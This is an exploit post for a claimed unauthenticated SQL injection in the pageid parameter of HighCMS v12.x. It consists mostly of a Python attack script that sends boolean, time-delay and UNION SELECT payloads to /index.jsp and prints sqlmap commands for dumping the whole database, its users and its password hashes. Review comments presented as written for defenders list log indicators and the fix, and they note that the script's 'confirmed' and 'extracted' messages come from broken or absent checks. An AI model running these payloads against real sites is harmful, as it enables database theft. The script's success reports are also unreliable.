=============================================================================================================================================
| # Title : HighCMS v12.x SQL Injection Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://aryanic.com/ |
=============================================================================================================================================
POC :
[+] References : https://packetstorm.news/files/id/167170/
[+] Summary : a critical SQL Injection vulnerability in HighCMS/HighCMS version 12.x. The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
HighCMS/HighCMS v12.x SQL Injection Exploit
Author: indoushka
Vulnerability: SQL Injection in pageid parameter

Review notes (what this script actually does, read for defenders):

- Every request in this file is a GET to ``/index.jsp`` with the query string
  ``siteid=1&fkeyid=&siteid=1&pageid=<value>``.  ``siteid`` is sent twice and
  ``pageid`` is the only part that varies; the payload is interpolated into
  the URL as-is, with no explicit encoding step.
- Log-review / WAF indicators visible in this file: ``pageid`` values that
  contain a quote, ``UNION SELECT``, ``SLEEP(``, ``@@version``, ``version()``,
  ``user()`` or ``FROM v$version``, always anchored on the constant ``6528``,
  plus the fixed User-Agent string set in ``HighCMSExploit.__init__``.
- The server-side fix for this bug class is to bind ``pageid`` as a query
  parameter (or reject anything that is not an integer) instead of
  concatenating it into SQL.
- TLS certificate verification is disabled on every request
  (``verify=False``), and the matching urllib3 warning is silenced below.
"""
import requests
import sys
import urllib3
from argparse import ArgumentParser

# Disable SSL warnings
# Silences the InsecureRequestWarning that each verify=False request would
# otherwise emit; it does not change any request behaviour.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


class HighCMSExploit:
    """Drive the probes (time-, error-, boolean- and UNION-based) against one host.

    ``target`` is taken verbatim from the command line with trailing slashes
    removed; nothing validates that it is an http(s) URL.  All HTTP traffic
    goes through a single ``requests.Session`` whose headers are set once in
    ``__init__``.
    """

    def __init__(self, target: str) -> None:
        # Trailing '/' is dropped so that the "/index.jsp?..." suffix appended
        # by every method does not produce a double slash.
        self.target = target.rstrip('/')
        self.session = requests.Session()
        # Static headers shared by every request; the User-Agent is a constant,
        # so it is the same on every probe this tool sends.
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Connection': 'keep-alive'
        })

    def check_vulnerability(self) -> bool:
        """Check if target is vulnerable to SQL Injection

        Sends each entry of ``test_payloads`` as the ``pageid`` value and
        returns True as soon as one of the checks fires; returns False when no
        check fires or every request raises.

        Defects noted in review (code left unchanged):

        - The boolean-based comparison is dead code: ``false_response`` is only
          assigned inside the ``'1'='1`` branch, and no single payload contains
          both markers, so ``true_response != false_response`` never runs.
        - The time-based check only measures wall-clock time, so any response
          that takes 5 s or longer for any reason (slow host, network) is
          reported as confirmed.
        - The error-indicator scan matches generic strings such as
          "syntax error" anywhere in the page body, and a hit only breaks the
          inner loop, so the remaining payloads are still sent afterwards.
        - ``import time`` is executed inside the loop body; harmless, but it
          belongs at module level with the other imports.
        """
        print(f"[*] Checking vulnerability for: {self.target}")
        # Test payloads
        test_payloads = [
            "6528' AND '1'='1",
            "6528' AND '1'='2",
            "6528' AND SLEEP(5)--",
            "6528 UNION SELECT 1,2,3,4,5--"
        ]
        vulnerable = False
        for payload in test_payloads:
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
            try:
                # Time-based SQL injection test
                if "SLEEP" in payload:
                    import time
                    start_time = time.time()
                    response = self.session.get(url, timeout=10, verify=False)
                    end_time = time.time()
                    # timeout=10 bounds connect/read separately, so a >= 5 s
                    # round trip is reachable without the server sleeping.
                    if end_time - start_time >= 5:
                        print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)")
                        vulnerable = True
                        break
                else:
                    response = self.session.get(url, timeout=10, verify=False)
                    # Check for error-based indicators
                    error_indicators = [
                        "SQL syntax",
                        "Microsoft OLE DB Provider",
                        "ODBC Driver",
                        "SQLServer",
                        "Unclosed quotation mark",
                        "syntax error"
                    ]
                    for error in error_indicators:
                        # Case-insensitive substring match over the whole body.
                        if error.lower() in response.text.lower():
                            print(f"[+] Error-based SQL Injection confirmed!")
                            print(f"[+] Payload: {payload}")
                            vulnerable = True
                            # Only exits the indicator loop, not the payload loop.
                            break
                    # Boolean-based test
                    # NOTE(review): the nested condition can never be true for
                    # the same payload, so the comparison below is unreachable.
                    if "'1'='1" in payload and response.status_code == 200:
                        true_response = response.text
                        if "'1'='2" in payload and response.status_code == 200:
                            false_response = response.text
                            if true_response != false_response:
                                print(f"[+] Boolean-based SQL Injection confirmed!")
                                vulnerable = True
                                break
            except Exception as e:
                # Any request error is printed and the next payload is tried.
                print(f"[-] Error testing payload {payload}: {e}")
                continue
        return vulnerable

    def exploit_union(self, columns: int = 5) -> bool:
        """Exploit using UNION-based SQL injection

        Tries ``NULL`` column counts from 1 to ``columns`` and treats the first
        HTTP 200 whose body does not contain the substring "error" as the
        right column count, then calls ``extract_data`` and returns True.
        Returns False when no count qualifies.

        Review note: "200 and no 'error' in the body" is a weak signal — many
        non-vulnerable pages satisfy it on the very first iteration, so the
        reported column count should not be trusted.
        """
        print(f"[*] Attempting UNION-based exploitation with {columns} columns")
        # Test different column counts
        for col_count in range(1, columns + 1):
            nulls = ','.join(['NULL'] * col_count)
            payload = f"6528 UNION SELECT {nulls}--"
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
            try:
                response = self.session.get(url, timeout=10, verify=False)
                if response.status_code == 200 and "error" not in response.text.lower():
                    print(f"[+] UNION injection successful with {col_count} columns")
                    # Now extract data
                    self.extract_data(col_count)
                    return True
            except Exception as e:
                # Request failure for this count is reported; loop continues.
                print(f"[-] Error with {col_count} columns: {e}")
        return False

    def extract_data(self, column_count: int) -> None:
        """Extract database information

        NOTE(review): despite its name and its output, this method parses
        nothing from any response.  It sends the version payloads until one
        returns HTTP 200 and prints "extracted"; it then sends the ``user()``
        payload and prints "extracted" regardless of status.  ``column_count``
        is accepted but unused — every payload hard-codes five columns — and
        the bare ``except:`` clauses swallow every exception, including
        KeyboardInterrupt.
        """
        print("[*] Extracting database information...")
        # Get database version
        version_payloads = [
            "6528 UNION SELECT 1,@@version,3,4,5--",
            "6528 UNION SELECT 1,version(),3,4,5--",
            "6528 UNION SELECT 1,banner,3,4,5 FROM v$version--"
        ]
        for payload in version_payloads:
            url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}"
            try:
                response = self.session.get(url, timeout=10, verify=False)
                if response.status_code == 200:
                    # Look for version information in response
                    # (no lookup is actually performed; the body is discarded)
                    print("[+] Database version information extracted")
                    break
            except:
                continue
        # Get current database user
        user_payload = f"6528 UNION SELECT 1,user(),3,4,5--"
        url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}"
        try:
            response = self.session.get(url, timeout=10, verify=False)
            # Printed unconditionally once the request returns, whatever the status.
            print("[+] Current user information extracted")
        except:
            pass

    def generate_sqlmap_command(self) -> None:
        """Generate sqlmap command for automated exploitation

        Prints four command lines built around the fixed ``pageid=6528`` URL.
        ``sqlmap_cmd`` is assigned but never used; the printed commands come
        from separate f-strings.  Nothing is executed by this method.
        """
        sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3'
        print("\n[+] SQLMap Commands:")
        print("=" * 50)
        print("# Basic detection:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch')
        print("\n# Full database dump:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all')
        print("\n# Get database users:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users')
        print("\n# Get database passwords:")
        print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords')


def main() -> None:
    """Parse the command line and dispatch to one mode.

    ``--check`` runs ``check_vulnerability`` only; ``--exploit`` runs the check
    and, on a positive, ``exploit_union``; ``--sqlmap`` only prints commands.
    With no mode flag the check runs and the follow-up commands are printed.
    The flags are tested in that order, so ``--check`` wins if several are
    given together.
    """
    # Banner text only; line breaks inside the literal were restored here
    # from the collapsed source and may not match the original exactly.
    banner = """
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
HighCMS/HighCMS v12.x SQL Injection Exploit
By: indoushka
"""
    print(banner)
    parser = ArgumentParser(description='HighCMS SQL Injection Exploit')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)')
    parser.add_argument('--check', action='store_true', help='Check vulnerability only')
    parser.add_argument('--exploit', action='store_true', help='Run full exploitation')
    parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands')
    args = parser.parse_args()
    exploit = HighCMSExploit(args.url)
    if args.check:
        if exploit.check_vulnerability():
            print("\n[!] Target is VULNERABLE to SQL Injection")
        else:
            print("\n[!] Target does not appear to be vulnerable")
    elif args.exploit:
        # A negative check prints nothing in this branch.
        if exploit.check_vulnerability():
            print("\n[*] Starting exploitation...")
            exploit.exploit_union()
    elif args.sqlmap:
        exploit.generate_sqlmap_command()
    else:
        # Default: check and provide options
        if exploit.check_vulnerability():
            print("\n[+] Vulnerability confirmed!")
            print("\nAvailable options:")
            print("1. Run full exploitation: python exploit.py -u TARGET --exploit")
            print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap")
        else:
            print("\n[-] Target not vulnerable or not accessible")


if __name__ == "__main__":
    # argparse already enforces -u/--url; this guard only replaces the
    # argparse error with a custom usage message when argv is empty.
    if len(sys.argv) == 1:
        print("Usage: python highcms_exploit.py -u https://target.com")
        print("Options: --check, --exploit, --sqlmap")
        sys.exit(1)
    main()
Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================